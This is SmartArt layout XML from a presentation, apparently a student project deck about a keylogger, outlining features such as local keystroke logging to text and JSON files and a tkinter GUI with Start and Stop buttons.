    <dgm:cxn modelId="{395F7A6A-BECB-455F-8B9F-B1551D864B56}" type="presOf" srcId="{909144A6-0A0B-4AE5-8249-0A95E7EB4A5C}" destId="{ECF9FEDD-7A02-4D67-AC3E-D8DC933BA48C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{3BFA776D-C474-4BDC-B4EE-1F63065B502E}" type="presOf" srcId="{92446F52-2A5D-47FA-BB92-1ECADD2BCE55}" destId="{500CFD40-23FE-4DD1-B3ED-76499482957A}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{9A50054E-B800-46E2-90AA-51F4B0EEE8A8}" type="presOf" srcId="{A6F8CFE5-FD32-4ED7-A970-BDD0D153CF91}" destId="{500CFD40-23FE-4DD1-B3ED-76499482957A}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{32891C6E-CABF-412A-8691-ABAF94696CE2}" srcId="{E1F47546-0038-4E34-8235-DB4E120A8819}" destId="{C343BE0B-75CF-4C54-BA97-348A26A1E6BE}" srcOrd="0" destOrd="0" parTransId="{F183B01D-C58B-41E9-8EC5-4CAFBD0DBFDF}" sibTransId="{3A8C1605-E6FB-45A2-ABB1-D2060505844C}"/>
    <dgm:cxn modelId="{D5F07F53-A018-4179-A014-2B4ADE4D48B5}" srcId="{053DDB1A-AB00-4089-BF0D-3812933D8670}" destId="{24D89EF5-3DDC-415F-9EC3-0AB0243D75D1}" srcOrd="1" destOrd="0" parTransId="{AA2F2F77-1CE0-495C-A644-44816D7906B8}" sibTransId="{A3AAA5AA-8ED3-4D5F-A31E-CC51E37EB787}"/>
    <dgm:cxn modelId="{5C8F9757-5DA2-4A02-80F1-4443E70F2155}" srcId="{E1F47546-0038-4E34-8235-DB4E120A8819}" destId="{92446F52-2A5D-47FA-BB92-1ECADD2BCE55}" srcOrd="1" destOrd="0" parTransId="{FA0063A5-3138-40B1-AB8C-5355ACA6298C}" sibTransId="{18CAF97A-9FD3-4441-BECE-80A602097E1A}"/>
    <dgm:cxn modelId="{3F541178-E315-416A-AC62-82059422DE43}" type="presOf" srcId="{24D89EF5-3DDC-415F-9EC3-0AB0243D75D1}" destId="{ECF9FEDD-7A02-4D67-AC3E-D8DC933BA48C}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{2B1FC27C-6A72-475A-AC70-D958F1F50A09}" type="presOf" srcId="{3BE6992C-6AD3-486B-9320-C83FA1B633C5}" destId="{62BFA832-8A1D-46BD-8840-16CF606227EE}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{9C261F7E-CD82-4245-9DDE-BAC2D7BF8F47}" type="presOf" srcId="{C343BE0B-75CF-4C54-BA97-348A26A1E6BE}" destId="{500CFD40-23FE-4DD1-B3ED-76499482957A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{BCC81280-37F5-4655-A67D-3698949DE781}" type="presOf" srcId="{F016D6A4-F0D1-44E6-A9C1-4397386AEC60}" destId="{38638AFD-E64D-4984-AF82-861D40FD21A1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{816A5B81-E2EC-4D82-970D-3B2DBF7AE415}" type="presOf" srcId="{5E8D91D3-7EE0-431E-B4F4-46D1B12752F4}" destId="{1E83BB1E-9F54-4A93-B6D6-4241384B78A3}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{FE20D781-BA5E-42D5-9B7C-84DE647AE8A2}" srcId="{053DDB1A-AB00-4089-BF0D-3812933D8670}" destId="{909144A6-0A0B-4AE5-8249-0A95E7EB4A5C}" srcOrd="0" destOrd="0" parTransId="{5F2B7D1A-C9A0-439B-9007-84660FFFA4A9}" sibTransId="{48631948-48A9-4234-9F63-630ECAC1396F}"/>
    <dgm:cxn modelId="{5D189D83-FCAA-41E0-8B3D-C4A3EE525071}" srcId="{E1F47546-0038-4E34-8235-DB4E120A8819}" destId="{E8AB2E33-A8D1-4ED7-B8C8-DE269FCDD812}" srcOrd="4" destOrd="0" parTransId="{EF966BDE-CE7B-4391-9351-3E9D8285A78A}" sibTransId="{1FB04D60-A1C7-474C-9947-97ACD48AE599}"/>
    <dgm:cxn modelId="{30DF4185-6738-4577-B11F-C84D0DE4ABAC}" srcId="{4780940B-923C-4778-931B-DA50DF0E44A6}" destId="{1A2C8633-0205-4107-AB87-E89B0524787D}" srcOrd="2" destOrd="0" parTransId="{4F6503FD-3789-4FE1-89A0-DCBF6DD03C48}" sibTransId="{5E4A3944-9527-4567-9500-A0AA4FD88008}"/>
    <dgm:cxn modelId="{FA22CD8A-FB51-4374-8164-4B69AAE828EC}" type="presOf" srcId="{401540F2-3546-4794-BEAD-60CA708BBAB6}" destId="{62BFA832-8A1D-46BD-8840-16CF606227EE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{56DE428E-6BAD-43E4-9EAD-496CC08B1BD2}" type="presOf" srcId="{4E768723-B704-4903-A024-168EA9A5FD83}" destId="{500CFD40-23FE-4DD1-B3ED-76499482957A}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{CBB0A796-1C54-4734-8609-6656A593898D}" srcId="{A490B8E1-BECA-40E2-B443-CC2EB583F086}" destId="{4780940B-923C-4778-931B-DA50DF0E44A6}" srcOrd="0" destOrd="0" parTransId="{D11905C4-5E48-432C-A711-9E78AB41E47F}" sibTransId="{8FED9F2E-B73E-4847-B1A9-4DE9AE5280C1}"/>
    <dgm:cxn modelId="{2D66C1A5-0933-46EB-996C-577DADA54F6F}" type="presOf" srcId="{E1F47546-0038-4E34-8235-DB4E120A8819}" destId="{9A38E2D1-D590-4467-8968-9CD0FFCA7F83}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{19BBEFA7-FDF5-4FE0-82AF-BD0865B1592E}" type="presOf" srcId="{053DDB1A-AB00-4089-BF0D-3812933D8670}" destId="{3D6B3199-C9BC-4A59-9AC4-2B4E7EDED6CC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{184787AF-AF71-4B07-87E2-4BD21D684BB7}" srcId="{E1F47546-0038-4E34-8235-DB4E120A8819}" destId="{FAC6CC07-A3C3-4902-B971-16F5CB0D965A}" srcOrd="5" destOrd="0" parTransId="{DB692DB9-97B5-44A0-AF8D-6AC312C3F477}" sibTransId="{0675E102-0B51-4AA5-9B80-9442F770FB8C}"/>
    <dgm:cxn modelId="{0578E2C1-A50E-4958-9C76-1A325A00FB11}" srcId="{E1F47546-0038-4E34-8235-DB4E120A8819}" destId="{4E768723-B704-4903-A024-168EA9A5FD83}" srcOrd="2" destOrd="0" parTransId="{2AF8405A-2A38-48BF-A45F-11341AFD0D6D}" sibTransId="{C438309D-0AE0-457A-B124-96ED9EF2B50B}"/>
    <dgm:cxn modelId="{7A1147DC-E952-46B6-A0CE-3BBC135A3FE0}" type="presOf" srcId="{4780940B-923C-4778-931B-DA50DF0E44A6}" destId="{555385C0-CD6A-4D3D-A231-E0D94107ABDB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{622CA3E4-5378-4B72-A6CC-28FF982065F9}" srcId="{E1F47546-0038-4E34-8235-DB4E120A8819}" destId="{A6F8CFE5-FD32-4ED7-A970-BDD0D153CF91}" srcOrd="3" destOrd="0" parTransId="{74F6514F-53BD-4916-B5A4-5F25B2E135DE}" sibTransId="{EB252C6B-E3D2-4E47-8A10-BAA742BCDB1A}"/>
    <dgm:cxn modelId="{1A57FEE4-6E0D-4785-ABD6-A415D1ACE6CA}" type="presOf" srcId="{32A03606-8EC6-4B70-825B-82CC6967C943}" destId="{1E83BB1E-9F54-4A93-B6D6-4241384B78A3}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{8C52BDE8-8618-4345-B832-B910B9DC3296}" type="presOf" srcId="{FAC6CC07-A3C3-4902-B971-16F5CB0D965A}" destId="{500CFD40-23FE-4DD1-B3ED-76499482957A}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{280145FC-1C38-4C94-98A8-81BC3220DD52}" type="presOf" srcId="{1F51DD1D-47FA-4C0D-92F5-B48A2892A005}" destId="{1E83BB1E-9F54-4A93-B6D6-4241384B78A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{A56515FD-73F9-496B-9956-88F8C7A42509}" type="presOf" srcId="{1A2C8633-0205-4107-AB87-E89B0524787D}" destId="{62BFA832-8A1D-46BD-8840-16CF606227EE}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{AE1D3032-432C-4BB8-9656-521BD1585F8E}" type="presParOf" srcId="{ECE5F9FA-5510-4E3C-B784-01CFF45D8B49}" destId="{357F28AF-FAD5-4BF0-8228-3898BDE48F5D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{F94EC62B-35CA-4FBA-B147-AA14B517E8A5}" type="presParOf" srcId="{357F28AF-FAD5-4BF0-8228-3898BDE48F5D}" destId="{555385C0-CD6A-4D3D-A231-E0D94107ABDB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{5DE2DF5C-852D-4A4C-9216-10633A40F20E}" type="presParOf" srcId="{357F28AF-FAD5-4BF0-8228-3898BDE48F5D}" destId="{62BFA832-8A1D-46BD-8840-16CF606227EE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{D150155C-A8A3-490D-9CE9-ED096F76BBFD}" type="presParOf" srcId="{ECE5F9FA-5510-4E3C-B784-01CFF45D8B49}" destId="{CAF66E0C-0559-47A4-AFBD-DCF12794F93A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{D62641EA-BC1A-45C8-B962-41529555DFA6}" type="presParOf" srcId="{ECE5F9FA-5510-4E3C-B784-01CFF45D8B49}" destId="{7D124873-C7D4-442D-8A06-F2D2ED18C958}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{EC14F956-D4F4-47D4-B5B6-129FD43027EE}" type="presParOf" srcId="{7D124873-C7D4-442D-8A06-F2D2ED18C958}" destId="{38638AFD-E64D-4984-AF82-861D40FD21A1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{E67C04FE-148E-48BA-A9C5-03C0BB14940B}" type="presParOf" srcId="{7D124873-C7D4-442D-8A06-F2D2ED18C958}" destId="{1E83BB1E-9F54-4A93-B6D6-4241384B78A3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{84ABA342-877E-4158-ADD3-28365DD38F0A}" type="presParOf" srcId="{ECE5F9FA-5510-4E3C-B784-01CFF45D8B49}" destId="{714CDA00-07F6-4272-B003-608ADE55FBBF}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{E2B393AC-CF07-429C-B5C1-CB7404B04644}" type="presParOf" srcId="{ECE5F9FA-5510-4E3C-B784-01CFF45D8B49}" destId="{F342BE25-4C0E-49B0-AEEC-0AEC2A572FC4}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{56539416-123C-4C45-88A2-27DEAB25FA8E}" type="presParOf" srcId="{F342BE25-4C0E-49B0-AEEC-0AEC2A572FC4}" destId="{9A38E2D1-D590-4467-8968-9CD0FFCA7F83}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{9F1BAAC7-BC83-4859-9891-A350D7D2C742}" type="presParOf" srcId="{F342BE25-4C0E-49B0-AEEC-0AEC2A572FC4}" destId="{500CFD40-23FE-4DD1-B3ED-76499482957A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{C81FCB92-3B43-4F3B-98DD-1F5F1F7CD70B}" type="presParOf" srcId="{ECE5F9FA-5510-4E3C-B784-01CFF45D8B49}" destId="{B9A7C00C-AB16-4ED0-A74D-E24ED2C1F13E}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{49D7E7FE-804C-4FCC-BF34-50E49CA65483}" type="presParOf" srcId="{ECE5F9FA-5510-4E3C-B784-01CFF45D8B49}" destId="{4C3474FC-BFA5-44CA-AF21-A35156CFB9A2}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{85013D84-2B1B-4E82-8E2B-AF0FB492D9E1}" type="presParOf" srcId="{4C3474FC-BFA5-44CA-AF21-A35156CFB9A2}" destId="{3D6B3199-C9BC-4A59-9AC4-2B4E7EDED6CC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{73918CFA-7450-453B-871A-F9C8ED85DF9C}" type="presParOf" srcId="{4C3474FC-BFA5-44CA-AF21-A35156CFB9A2}" destId="{ECF9FEDD-7A02-4D67-AC3E-D8DC933BA4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B8257-E7DF-4E5E-B2A9-5F561FB55591}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1329844" y="0"/>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What is Keylogger and Security?</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1455463" y="0"/>
        <a:ext cx="4506554" cy="502477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DBC05523-80F7-4655-A130-0B44E1666E9A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1041131" y="880"/>
          <a:ext cx="502477" cy="5024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C47002B-861F-4068-A7F6-3244CEC2C4BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1292369" y="653350"/>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Problem Statement</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1417988" y="653350"/>
        <a:ext cx="4506554" cy="502477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FA6F4FD3-FA1C-4024-9D1D-F22D16E3A27F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1041131" y="653350"/>
          <a:ext cx="502477" cy="50247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3B2F193-D487-4957-A8D9-3C610D1BEF4C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1292369" y="1305821"/>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Project Overview</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1417988" y="1305821"/>
        <a:ext cx="4506554" cy="502477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EA76F5EB-5CF4-4C90-889A-692BDB77F22D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1041131" y="1305821"/>
          <a:ext cx="502477" cy="5024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7A37E47-2337-4B6C-8A84-7A9F8FE2AEA6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1292369" y="1958292"/>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Who are the End Users.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1417988" y="1958292"/>
        <a:ext cx="4506554" cy="502477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1DD37B6D-9FBE-4052-8E7A-A35F6C36EF86}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1041131" y="1958292"/>
          <a:ext cx="502477" cy="502477"/>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3000" r="-13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A216FFF-8446-43FE-B954-ADDB54D9D913}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1292369" y="2610763"/>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 Solution And Its Value Proposition</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2200" kern="1200" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1417988" y="2610763"/>
        <a:ext cx="4506554" cy="502477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{53CA09FB-C003-4A5F-90C5-820C7964D2FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1041131" y="2610763"/>
          <a:ext cx="502477" cy="502477"/>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023E624-1713-4646-95E0-9B199660DB5D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1292369" y="3263233"/>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The Wow in our Solution</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1417988" y="3263233"/>
        <a:ext cx="4506554" cy="502477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{33E2AF8D-F85D-4460-AA23-340C6856C082}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1041131" y="3263233"/>
          <a:ext cx="502477" cy="502477"/>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6D81D17-02CF-469A-A1F6-CFB059B3A8CD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1292369" y="3915704"/>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Modelling</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1417988" y="3915704"/>
        <a:ext cx="4506554" cy="502477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CA24E6F5-9463-421F-94B8-AD78A2CABF86}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1041131" y="3915704"/>
          <a:ext cx="502477" cy="502477"/>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3935545-314F-48BB-BB4A-23E09CFCC263}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1292369" y="4568175"/>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Results</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="2200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1417988" y="4568175"/>
        <a:ext cx="4506554" cy="502477"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5EAD1D50-E5C3-4A9F-947D-DE722C1250AC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1041131" y="4568175"/>
          <a:ext cx="502477" cy="502477"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill>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64408-CF09-4222-A018-74CA13DACEC9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="847"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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>1.Capture Keystrokes:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" b="1"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Detect and log each key press, hold, and release event.</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Store the logged keystrokes in a list.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="847" y="1477327"/>
        <a:ext cx="1319249" cy="1477327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C8CB6295-04BE-4EA4-9F6A-BF9482E09C6C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="36458" y="224452"/>
          <a:ext cx="1229875" cy="122987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CF7B15A-721B-468A-82AE-D533A5DC693B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1359674"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rPr>
            <a:t>2.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Log Storage</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200"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Save the keystrokes in a text file named key_log.txt.</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Save the keystrokes in a JSON file named key-log. Json.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1359674" y="1477327"/>
        <a:ext cx="1319249" cy="1477327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3BAAE64C-0C0C-436C-B4D1-CB1DBB24D5DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1404361" y="221599"/>
          <a:ext cx="1229875" cy="122987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7734C01-2287-493B-9F67-D1D31C1B37A9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2719349"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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>3.Graphical User Interface (GUI)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200"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Provide a simple GUI using the tkinter library.</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Include "Start" and "Stop" buttons to control the keylogger.</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Display the status of the keylogger (running or stopped) in the GUI</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" kern="1200" baseline="0" dirty="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2719349" y="1477327"/>
        <a:ext cx="1319249" cy="1477327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{76A8BCAD-F926-456C-847F-7C01C78E402B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2763188" y="221599"/>
          <a:ext cx="1229875" cy="122987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28F9F94-476C-48F1-94BE-EC3D86C96236}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="161543" y="2954655"/>
          <a:ext cx="3715511" cy="553997"/>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24D0E-65E2-46AB-8295-CDB0E6AB60C5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0"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solidFill>
              <a:srgbClr val="FF0066"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>4.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Keyboard Event Handlers</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
